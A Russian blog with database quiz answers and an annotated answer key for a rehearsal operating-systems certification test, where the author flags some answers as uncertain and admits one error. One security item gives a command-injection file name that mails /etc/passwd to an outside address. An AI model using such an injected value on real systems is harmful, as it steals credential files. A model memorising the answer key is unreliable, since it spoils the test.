вторник, 24 мая 2016 г.

БД в вопросах и ответах



1.      Составной частью типичной СУБД не является …… Библиотека запросов пользователей
2.      Основными понятиями реляционной модели данных являются …. Отношение, кортеж, домен, атрибут
3.      В состав теоретико-множественных операций не входит операция ….. Обратного произведения отношений
4.      Для преобразования связи «многие-ко-многим» из ER-диаграммы к схеме БД следует …. Создать дополнительную таблицу, в которую добавить атрибуты первичных ключей связываемых таблиц
5.      В иерархической модели данных у узла данных может быть …. Не более одного предка
6.      Практически процедура нормализации заканчивается при достижении …. Третьей нормальной формы
7.      Функциональная зависимость атрибута А от атрибута В ….. Означает, что каждому значению В соответствует не более одного значения А
8.      Элемент «сущность» на семантической диаграмме изображается ….. Прямоугольником с именем сущности
10.  В семантическом моделировании БД связь – это графически изображаемая ассоциация между ….. Несколькими сущностями
11.  Удалить таблицу из базы данных можно командой языка SQL …. DROP
12.  Отношение в первой нормальной форме - это отношение …. Удовлетворяющее свойствам понятия «отношение» реляционной модели
13.  В основе процесса нормализации лежит процедура …. Декомпозиции
14.  Предметная область в информационной модели – это … Часть реального мира, сведения о которой должны быть отражены в БД
15.  К числу специальных реляционных операций не относится … Разъединение отношений
16.  Заголовок отношения – это ….. Именованное множество пар (имя атрибута, имя домена)
17.  СУБД – это …. Специализированно программное обеспечение для работы с базами данных
18.  Кортеж реляционного отношения – это … Множество пар (имя атрибута, значение атрибута)
19.  Операция эквисоединения строится на основе операций …. Прямого произведения и ограничения
20.  При моделировании данных сущности предметной области …. Превращаются в отношения
21.  Процедуры нормализации основаны на ….. Анализе функциональных зависимостей между атрибутами отношения
22.  Отношение является отношением во второй нормальной форме, если в нем отсутствуют …. Зависимости между частями составного ключа и не-ключевыми
 атрибутами
23.  Наибольшее распространение получил метод семантического анализа, основанный на построении диаграмм ….«сущности – связи»
24.  Укажите ошибку в характеристике конца связи ….. Виртуальный
25.  Указать ошибочное утверждение:«Определение ограничений целостности таблицы включает»  …. Ограничение вторичного ключа
27.  Указать ошибочное утверждение : «При преобразовании ER- диаграммы к схеме БД …» ….. Связи превращаются в первичные ключи
28.  Не является СУБД …..1С:Бухгалтерия
29.  Отношение является отношением в третьей нормальной форме, если в нем отсутствуют ….. Транзитивные зависимости между не-ключевыми атрибутами
30.  Аномалия включения или добавления заключается в том, что ….. Нельзя добавить новые данные из-за невозможности сформировать первичный ключ
31.  Основной функцией компилятора языка БД является …. Компиляция операторов языка БД в выполняемую программу
32.  Манипуляционная часть реляционной модели … Включает реляционную алгебру и реляционное исчисление
33.  Реляционное исчисление и реляционная алгебра ….. Обладают свойством неизбыточности
34.  Иллюстрацией понятия атрибута сущности является ….. Столбец таблицы
35.   Запрос SELECT не может содержать служебные слова …. SORT BY

суббота, 25 августа 2012 г.


Аттестационное тестирование в сфере профессионального образования
(весь юмор в том, что чиновники из Минобра пытаются проверить через тесты спецдисциплину, в которой они "ни уха-ни рыла...", а потому берется какой-нибудь ублюдочный курс и из него выдергиваются вопросы и ответы, все хорошо, если читать именно этот курс, в остальном - вероятность попадания 20-30%; я пошустрил по И-нету, нашел, как мне кажется, прообраз -  курс "Операционные системы, среды и оболочки" какого-то южного (то ли ставропольского, то ли черкасского :-) педагогического унивеситета (!!!), и на основании их мудрствований подготовил ответы, добавив в "мутных" случаях комментарии из этого курса, Wiki и Googl-а)
 Это - ответы на репетиционный тест, надеюсь, что основной не намного умнее. В вопросы добавлены названия разделов, приведены все ответы, правильные выделены размером. По моему убеждению, чтобы пройти тестирование, нормальному студенту достаточно накануне прочитать два-три  раза эту белиберду, память у вас еще прекрасная, что-то в ней останется и этого будет достаточно для 40-50%-ного результата. (В конце есть ряд вопросов по компьютерной безопасности, тема эта в курсе ОС не рассматривается, да и то, что там представлено, - борьба с вирусами в изложении для слабоумных, компьютерная безопасность - серьезная вещь, и не нам, сирым и убогим, в ней разбираться :-).
Успехов вам, М.А.  

Приношу свои извинения возможным читателям, в нижеприведенных ответах обнаружены ошибки, которые постараюсь сейчас исправить.М.А. 30.08.12 - 19.00 (к сожалению, одну ошибку все-таки так и не смог найти :-( , простите ).  


Специальность: 230101.65  – Вычислительные машины, комплексы, системы и сети
Дисциплина: Операционные системы
Время выполнения теста: 90 минут
Количество заданий: 50
ЗАДАНИЕ N 1 Назначение и функции операционных систем ( - выберите один вариант ответа)

Для сетевых операционных систем характерной является функция обеспечения …
1) 
прямого доступа к оперативной памяти другого компьютера
  
2) 
взаимодействия связанных между собой компьютеров
3) 
обмена сигналами между выполняющимися на разных компьютерах программами
  
4) 
программных каналов между разными компьютерами

ЗАДАНИЕ N 2 Операционная среда ( - выберите один вариант ответа)

Одна операционная система может поддерживать несколько …
1) 
микропрограммных сред
  
2) 
операционных систем
3) 
микропрограммных систем
  
4) 
операционных сред
Операционная система выполняет функции управления вычислительными процессами в вычислительной системе, распределяет ресурсы вычислительной системы между различными вычислительными процессами и  образует программную среду, в которой выполняются прикладные программы пользователя. Такая среда называется операционной. Параллельное существование терминов “операционная система” и “операционная среда” вызвано тем, что операционная система может поддержать несколько операционных сред.


ЗАДАНИЕ N 3 Прерывания ( - выберите один вариант ответа)

Термин "маскирование" означает запрет отдельных …
1) 
сигналов прерывания
  
2) 
команд пользователя
3) 
процессов пользователя
  
4) 
команд процессора

ЗАДАНИЕ N 4 Процессы и потоки ( - выберите один вариант ответа)

Для реализации синхронизации на уровне языка программирования используются высокоуровневые примитивы, названные …
1) 
супервизорами
  
2) 
мониторами
3) 
маркерами
  
4) 
семафорами
Монитор (по Ч. Хоару) – высокоуровневая конструкция для синхронизации: многовходовый модуль, содержащий описание общих данных и операций над ними в виде процедур. Обеспечивается взаимное исключение исполнения мониторных операций. Монитор может также содержать условные переменные, для которых определены операции wait и signal для организации дополнительных очередей процессов. Рассмотрено решение задачи "обедающие философы" с использованием монитора. Описана реализация монитора и условных переменных с помощью семафоров.


ЗАДАНИЕ N 5 Файлы и файловые системы ( - выберите один вариант ответа)

Относительный путь к файлу состоит из списка каталогов, которые нужно …
1) 
пройти от рабочего каталога, чтобы добраться до файла
  
2) 
открыть в корневом процессе, чтобы добраться до файла
3) 
добавить в переменную PATH операционной среды
  
4) 
пройти от корневого каталога, чтобы добраться до файла

ЗАДАНИЕ N 6 Память ( - выберите один вариант ответа)

Свопингом сегментов называется перемещение …
1) 
блоков файла между каталогами файловой системы
  
2) 
блоков данных между процессом и ядром операционной системы
3) 
сегментов данных между стеком и оперативной памятью
  
4) 
сегментов между оперативной и внешней памятью


ЗАДАНИЕ N 7 Пользователи ( - выберите один вариант ответа)

Идентификатор пользователя представляет собой уникальное _______ значение
1) 
составное
  
2) 
символьное
3) 
вещественное
  
4) 
целое

ЗАДАНИЕ N 8 Режимы работы ( - выберите один вариант ответа)

Мультитерминальный режим работы предполагает совмещение …
1) 
привилегированного режима работы и режима пользователя
  
2) 
многопроцессорного режима работы и режима ввода-вывода
3) 
диалогового режима работы и режима мультипрограммирования
  
4) 
аналогового режима работы и режима микропрограммирования


ЗАДАНИЕ N 9 Концепция процесса ( - выберите один вариант ответа)

Последовательная трансляция двух исходных программ является …
1) 
одним последовательным процессом
  
2) 
двумя одинаковыми процессами
3) 
двумя разными процессами
  
4) 
одной последовательной задачей

ЗАДАНИЕ N 10 Идентификатор, дескриптор и контекст процесса ( - выберите несколько вариантов ответа)

Идентификатор процесса является частью _____________ процесса.
1) 
контекста
  
2) 
типа
3) 
дескриптора !!!
  
4) 
описателя


ЗАДАНИЕ N 11 Иерархия процессов ( - выберите один вариант ответа)

В OS UNIX каждый новый процесс может быть образован (порожден) только …
1) 
двумя из существующих процессов
  
2) 
несколькими родительскими процессами
3) 
четным количеством родительских процессов
  
4) 
одним из существующих процессов

ЗАДАНИЕ N 12 Диспетчеризация процессов ( - выберите один вариант ответа)

Основное различие между долгосрочным и краткосрочным планированием (диспетчеризацией) заключается в …
1) 
длительности выполнения
  
2) 
очередности выполнения
3) 
скорости выполнения
  
4) 
частоте выполнения
Планирование заданий используется в качестве долгосрочного планирования процессов. Оно отвечает за порождение новых процессов в системе, определяя ее степень мультипрограммирования, т. е. количество процессов, одновременно находящихся в ней. Если степень мультипрограммирования системы поддерживается постоянной, т. е. среднее количество процессов в компьютере не меняется, то новые процессы могут появляться только после завершения ранее загруженных. Поэтому долгосрочное планирование осуществляется достаточно редко. 


ЗАДАНИЕ N 13 Понятия приоритета и очереди процессов ( - выберите один вариант ответа)

Приоритет, меняющейся во время исполнения процесса, называется _____________ приоритетом.
1) 
фиксированным
  
2) 
циклическим
3) 
статическим
  
4) 
динамическим

ЗАДАНИЕ N 14 Синхронизация процессов ( - выберите один вариант ответа)

При совместном использовании процессами аппаратных и информационных ресурсов вычислительной системы возникает потребность в …
1) 
адаптации
  
2) 
синхронизации
3) 
оптимизации
  
4) 
буферизации


ЗАДАНИЕ N 15 Средства обработки сигналов ( - выберите один вариант ответа)

В операционной системе UNIX сигналы можно рассматривать как простейшую форму взаимодействия между …

1) 
процессами
  
2) 
процессорами
3) 
сегментами
  
4) 
каналами

ЗАДАНИЕ N 16 Понятие событийного программирования ????? ( - выберите несколько вариантов ответа)

Область эффективного применения событийного программирования начинается там, где возникают …
1) 
трудности декомпозиции решаемой задачи, при которой генерация и обработка рассматриваются как объединенные процессы
  
2) 
возможности декомпозиции решаемой задачи, при которой генерация и обработка рассматриваются как объединенные процессы
3) 
необходимость использования графа перехода между состояниями
  
4) 
неудобство использования графа переходов между состояниями


ЗАДАНИЕ N 17 Средства коммуникации процессов ( - выберите один вариант ответа)

Два параллельных процесса могут быть …
1) 
взаимоисключающими
  
2) 
независимыми
3) 
критическими
  
4) 
коммутационными

ЗАДАНИЕ N 18 Способы реализации мультипрограммирования ( - выберите один вариант ответа)

Главной целью мультипрограммирования в системах пакетной обработки является …
1) 
обеспечение удобства работы пользователей
  
2) 
минимизация простоев всех устройств компьютера
3) 
минимизация времени выполнения одной задачи
  
4) 
обеспечение реактивности системы


ЗАДАНИЕ N 19 Организация памяти. Адресное пространство ( - выберите один вариант ответа)

Учет участков свободной памяти с помощью связного списка свободных/занятых блоков позволяет …
1) 
находить в памяти наиболее долго занятые участки
  
2) 
выделять участки  памяти произвольных размеров
3) 
освобождать память, занятую неактивными процессами
  
4) 
перемещать процессы в памяти

ЗАДАНИЕ N 20 Методы управления памятью ( - выберите один вариант ответа)

Использование виртуальной памяти в однопрограммном режиме  приводит к … процесса, если размер программы существенно больше объема доступной оперативной памяти
1) 
аварийному завершению
  
2) 
ускорению
3) 
замедлению выполнения
  
4) 
перезапуску


ЗАДАНИЕ N 21 Принципы организации виртуальной памяти ( - выберите несколько вариантов ответа)

Виртуальная память позволяет  …
1) 
отказаться от предоставления прикладным процессам оперативной памяти
  
2) 
загружать множество небольших программ, суммарный объем которых больше объема физической памяти
3) 
загружать программы, размер которых превышает объем доступной физической памяти
  
4) 
загружать программы, скомпилированные для другого процессора

ЗАДАНИЕ N 22 Сегментная организация памяти ( - выберите один вариант ответа)

Сегментная организация памяти … отдельно скомпилированных процедур.
1) 
состоит из
  
2) 
упрощает компоновку
3) 
невозможна без
  
4) 
усложняет компоновку
Помимо простоты управления увеличивающимися или сокращающимися структурами данных, сегментированная память обладает и другими преимуществами.
К ним относятся: простота компоновки отдельно скомпилированных процедур (обращение к начальной точке процедуры осуществляется адресом вида (n,0), где n – номер сегмента);


ЗАДАНИЕ N 23 Страничная организация памяти ( - выберите один вариант ответа)

При страничной организации памяти таблица страниц может размещаться в …
1) 
только в оперативной памяти
  
2) 
в оперативной памяти и на диске
3) 
только в процессоре
  
4) 
в специальной быстрой памяти процессора и в оперативной памяти

ЗАДАНИЕ N 24 Ускорение работы страничной памяти ( - выберите один вариант ответа)

Страничная организация предназначена для …
1) 
облегчения совместного использования процедур, библиотек и массивов данных
  
2) 
повышения уровня защиты программ и данных
3) 
получения большого адресного пространства без приобретения дополнительной физической памяти
  
4) 
логического разделения программ и данных

ЗАДАНИЕ N 25 Принципы замещения страниц ( - выберите один вариант ответа)

При страничном сбое и отсутствии свободных блоков физической памяти операционная система должна …
1) 
выбрать страницу-кандидат на удаление из памяти и сохранить удаляемую страницу на диске
  
2) 
выбрать страницу-кандидат на удаление из памяти и сохранить удаляемую страницу на диске, если она претерпела изменения
3) 
выбрать страницу, которая не изменялась, и сохранить удаляемую страницу на диске
  
4) 
выбрать страницу-кандидат на удаление из памяти и сохранить копию удаляемой страницы в таблице страниц

ЗАДАНИЕ N 26 Алгоритмы замещения страниц ( - выберите один вариант ответа)

Полная реализация алгоритма LRU (Least Recently Used) …
1) 
теоретически невозможна
  
2) 
возможна при использовании стековой организации таблицы страниц
3) 
возможна при условии построения таблицы страниц в виде бинарных деревьев
  
4) 
практически невозможна
LRU - хороший, но труднореализуемый алгоритм. Необходимо иметь связанный список всех страниц в памяти, в начале которого будут хранится недавно использованные страницы. Причем этот список должен обновляться при каждом обращении к памяти. Много времени нужно и на поиск страниц в таком списке.


ЗАДАНИЕ N 27 Прерывания от внешних устройств ( - выберите один вариант ответа)

Запросы на ввод-вывод от супервизора задач или от программных модулей самой операционной системы получает _____________ ввода-вывода.
1) 
контроллер
  
2) 
диспетчер
3) 
супервизор
  
4) 
процессор
супервизор ввода-вывода получает запросы на ввод-вывод от супервизора задач или от программных модулей самой операционной системы

ЗАДАНИЕ N 28 Классификация устройств ввода-вывода ( - выберите один вариант ответа)

Мыши (в качестве устройства-указателя) относятся к _____________ устройствам ввода-вывода.
1) 
позиционируемым
  
2) 
символьным
3) 
адресуемым
  
4) 
блочным
Другой тип устройств ввода-вывода — символьные устройства. Они выдают или воспринимают поток символов, не относящийся ни к какой блочной структуре. Они не являются адресуемыми и не имеют никакой операции позиционирования. В качестве символьных устройств могут рассматриваться принтеры, сетевые интерфейсы, мыши (в качестве устройства-указателя)


ЗАДАНИЕ N 29 Основные принципы организации ввода-вывода ( - выберите один вариант ответа)

Любые операции по управлению вводом-выводом объявляются …
1) 
привилегированными
  
2) 
универсальными
3) 
приоритетными
  
4) 
уникальными

ЗАДАНИЕ N 30 Функции супервизора ввода-вывода ( - выберите один вариант ответа)

Супервизор ввода-вывода инициирует операции ввода-вывода и в случае управления вводом-выводом с использованием прерываний предоставляет процессор …
1) 
супервизору прерываний
  
2) 
диспетчеру задач
3) 
задаче пользователя
  
4) 
супервизору программ


ЗАДАНИЕ N 31 Режимы управления вводом-выводом ( - выберите один вариант ответа)

В режиме обмена с опросом готовности устройства ввода-вывода используется _____________ центрального процессора.
1) 
рационально время
  
2) 
нерационально память
3) 
нерационально время
  
4) 
рационально память

ЗАДАНИЕ N 32 Закрепление устройств, общие устройства ввода-вывода ( - выберите один вариант ответа)

Понятия «виртуального устройства» по отношению к понятию «спулинга» …
1) 
соотносится как часть и целое???
  
2) 
является более широким!!
3) 
является более узким
  
4) 
тождественно


ЗАДАНИЕ N 33 Основные системные таблицы ввода-вывода ( - выберите один вариант ответа)

Каждый элемент таблицы оборудования условно называется …
1) 
UCB!!!
  
2) 
USB
3) 
DCB
  
4) 
DRT
Каждая ОС имеет свои таблицы ввода/вывода, их состав (количество и назначе­ние каждой таблицы) может сильно отличаться. Первая таблица содержит информацию обо всех устройствах вво­да/вывода, подключенных к вычислительной системе,- таб­лица оборудования (equipment table), а каждый элемент этой таблицы на­зывается UCB (unit control block, блок управления устройством ввода/вывода). Вторая таблица предназначена для реализации принципа виртуа­лизации устройств ввода/вывода – независимости от устройства. Действительное устройство, которое сопоставляется виртуальному (логическому), выбирается супервизором с помощью таблицы описания виртуальных логических устройств (DRT, device reference table). Назначение этой второй таблицы – установление связи между виртуальными (логическими) устройствами и реальными устройст­вами, описанными посредством первой таблицы оборудования.

ЗАДАНИЕ N 34 Синхронный и асинхронный ввод-вывод ( - выберите один вариант ответа)

Для увеличения скорости выполнения приложений при необходимости предлагается использовать _____________ ввод-вывод.
1) 
асинхронный
  
2) 
приоритетный
3) 
автоматический
  
4) 
синхронный


ЗАДАНИЕ N 35 Организация внешней памяти на магнитных дисках ( - выберите один вариант ответа)

Программа, расположенная в главной загрузочной записи, называется _____________ загрузчиком.
1) 
системным
  
2) 
внесистемным
3) 
начальным
  
4) 
локальным
На жестком диске по физическому адресу 0-0-1 располагается главная загрузочная
запись (master boot record, MBR). В состав MBR входят:

    - внесистемный загрузчик (non-system bootstrap - NSB);
    - таблица описания разделов диска (таблица разделов, partition table, PT).

ЗАДАНИЕ N 36 Кэширование операций ввода-вывода при работе с накопителями на магнитных дисках ( - выберите один вариант ответа)

Простейшим вариантом ускорения дисковых операций чтения данных можно считать использование двойной …
1) 
кластеризации
  
2) 
буферизации
3) 
диспетчеризации
  
4) 
приоритезации


ЗАДАНИЕ N 37 Принципы построенияОС ( - выберите один вариант ответа)

Операционная система реального времени должна обеспечивать …
1) 
делегирование полномочий
  
2) 
наследование приоритетов
3) 
пакетную обработку
  
4) 
клонирование пользователей
Требования, предъявляемые к среде исполнения систем реального времени, следующие:
- ядро с приоритетом на обслуживание прерывания. Приоритет на прерывание означает, что готовый к запуску процесс, обладающий некоторым приоритетом, обязательно имеет преимущество в очереди по отношению к процессу с более низким приоритетом, быстро заменяет последний и поступает на выполнение. Ядро заканчивает любую сервисную работу, как только поступает задача с высшим приоритетом.
- диспетчер с приоритетом - дает возможность разработчику прикладной программы присвоить каждому загрузочному модулю приоритет, неподвластный системе. Присвоение приоритетов используется для определения очередности запуска программ, готовых к исполнению. Диспетчеризация, в основу которой положен принцип присвоения приоритета, и наличие ядра с приоритетом на прерывание позволяют . Если наступает событие с высшим приоритетом, система прекращает обработку задачи с низшим приоритетом и отвечает на вновь поступивший запрос.
Мартин Тиммерман сформулировал следующие необходимые требования для ОСРВ
  • ОС должна быть многозадачной и допускающей вытеснение (preemptable),
  • ОС должна обладать понятием приоритета для потоков,
  • ОС должна поддерживать предсказуемые механизмы синхронизации,
  • ОС должна обеспечивать механизм наследования приоритетов,

ЗАДАНИЕ N 38 Ядро и ресурсы ( - выберите один вариант ответа)

К невыгружаемым относятся такие ресурсы, которые не могут быть …
1) 
загружены в память
  
2) 
выгружены из памяти
3) 
отобраны у процесса
  
4) 
отобраны у процессора
Выгружаемый ресурс - этот ресурс безболезненно можно забрать у процесса (например: память).
Невыгружаемый ресурс - этот ресурс нельзя забрать у процесса без потери данных (например: принтер).


ЗАДАНИЕ N 39 Интерфейсы операционных систем ( - выберите один вариант ответа)

Интерфейс прикладного программирования предназначен для использования прикладными программами …
1) 
системных ресурсов компьютера
  
2) 
регистров общего назначения процессора
3) 
интерпретатора команд пользователя
  
4) 
адресного пространства процесса
Практически все операционные системы  имеют API, с помощью которого программисты могут создавать приложения для этой операционной системы. Главный API операционных систем — это множество системных вызовов.

ЗАДАНИЕ N 40 Классификация операционных систем ( - выберите несколько вариантов ответа)

По режиму обработки задач различают операционные системы, обеспечивающие _________ режим
1) 
мультипрограммный
  
2) 
виртуальный
3) 
однопрограммный
  
4) 
многопользовательский???


ЗАДАНИЕ N 41 Анализ угроз и уязвимостей в операционных системах ( - выберите один вариант ответа)

Угроза зомби реализуется с помощью … и заставляет компьютер выполнять приказания других лиц.
1) 
вызова утилит операционной системы
  
2) 
диспетчера приложений
3) 
вредоносных программ
  
4) 
подбора пароля
ботнет или зомби-сеть – это сеть компьютеров, зараженных вредоносной программой поведения Backdoor. Backdoor’ы позволяют киберпреступникам удаленно управлять зараженными машинами (каждой в отдельности, частью компьютеров, входящих в сеть, или всей сетью целиком) без ведома пользователя.

ЗАДАНИЕ N 42 Основы криптографии ( - выберите один вариант ответа)

Недостаток систем шифрования с секретным ключом состоит в том, что …
1) 
отправитель сообщения не может его расшифровать
  
2) 
отправитель и получатель должны иметь общий секретный ключ
3) 
объем вычислений при дешифровании намного больше, чем при шифровании
  
4) 
объем вычислений при шифровании намного больше, чем при дешифровании  
Эффективность систем с секретным ключом обусловлена вполне приемлемым объемом вычислений, необходимых для шифрования или дешифрования сообщения, но у них имеется серьезный недостаток: и отправитель, и получатель должны владеть общим секретным ключом


ЗАДАНИЕ N 43 Механизмы защиты ( - выберите один вариант ответа)

Объектами защиты в компьютерных системах могут быть …
ВАРИАНТЫ ОТВЕТОВ:
1) 
устройства отображения информации
  
2) 
помещения
3) 
сотрудники
  
4) 
программы
Объект защиты — информация, носитель информации или информационный процесс, в отношении которых необходимо обеспечивать защиту в соответствии с поставленной целью защиты информации.

ЗАДАНИЕ N 44 Надежные вычислительные системы ( - выберите один вариант ответа)

Политика принудительного управления доступом (mandatory access control) возлагает полномочия по назначению прав доступа к файлам и другим объектам на ...
ВАРИАНТЫ ОТВЕТОВ:
1) 
пользователей
  
2) 
прикладную программу
3) 
операционную систему
  
4) 
руководителей подразделений


ЗАДАНИЕ N 45 Методы аутентификации ( - выберите один вариант ответа)

Защита зашифрованных паролей в UNIX взламывается путем …
1) 
шифрования множества потенциальных паролей открытым алгоритмом шифрования и поиска совпадений в файле паролей
  
2) 
привлечения инсайдеров в качестве сообщников
3) 
расшифровки всех паролей после копирования файла паролей
  
4) 
вычисления пароля путем свертки идентификатора пользователя

ЗАДАНИЕ N 46 Инсайдерские атаки ( - выберите один вариант ответа)

Лазейки в программах создаются …
1) 
для облегчения отладки программ или в противоправных целях
  
2) 
только для противоправных целей
3) 
для внедрения в программу постороннего кода
  
4) 
только для облегчения отладки программ
Лазейки (trapdoors). Лазейка представляет собой точку вхо­да в программу, благодаря чему открывается непосредственный доступ к некоторым системным функциям. Лазейки обычно встав­ляют во время проектирования системы. Системные программисты организуют их при отладке программы, но по завершении ее разработки их надо устранить.


ЗАДАНИЕ N 47 Внешние атаки ( - выберите один вариант ответа)

Программа, выполняющая копирование файла путем системного вызова, запрашивает у пользователя имена файла-источника и файла-приемника. Злоумышленник ввел в качестве имен файлов следующие значения: “aaa” и “bbb; mail goofinator@mail.ru </etc/passwd”. Какие действия выполнит система?
1) 
Скопирует файл aaa в bbb отправит файл bbb адресату goofinator@mail.ru.
  
2) 
Отправит файл aaa адресату goofinator@mail.ru.
3) 
Скопирует текст aaa в файл паролей, относящийся к пользователю с идентификатором goofinator@mail.ru.
  
4) 
Скопирует файл aaa в bbb и отправит по электронной почте файл паролей адресату goofinator@mail.ru.

ЗАДАНИЕ N 48 Вредоносные программы ( - выберите один вариант ответа)

Наиболее популярное применение ботнетов (сети зараженных компьютеров) - это …
1) 
организация сетевых азартных игр
  
2) 
распространение пиратского контента
3) 
рассылка коммерческого спама
  
4) 
хищение денег с кредитных карт


ЗАДАНИЕ N 49 Троянские кони и вирусы ( - выберите один вариант ответа)

Перезаписывающий вирус заражает исполняемую программу путем  …
1) 
записи кода вируса в тело зараженной программы после каждого ее вызова
  
2) 
перезаписи содержимого стека программы кодом вируса
3) 
перезаписи служебных секторов дисков
  
4) 
записи вируса на место кода программы!!!

ЗАДАНИЕ N 50 Средства защиты от вредоносных программ ( - выберите один вариант ответа)

Обнаружить зашифрованный вирус можно  ...
1) 
с помощью универсальной программы дешифрования
  
2) 
по характерному поведению зараженной программы при запуске
3) 
по сигнатурам кода процедур расшифровки вируса!!!
  
4) 
по изменению размера программы
Это вирусы-партизаны, которые попав в систему, сразу не дают себя обнаружить и не вступают в активную фазу. Они выжидают нужное им время, находясь в закодированном и безвредном состоянии, при этом зачастую они остаются незамеченными сканерами антивирусов. Как только наступает благоприятное для заражения файлов время, вирусы дешифруются, выполняют свою «грязную работу» и снова кодируются. Различные методы шифрования и упаковки вредоносных программ делают даже известные вирусы не обнаруживаемыми антивирусным программным обеспечением. Для обнаружения этих «замаскированных» вирусов требуется мощный механизм распаковки, который может дешифровать файлы перед их проверкой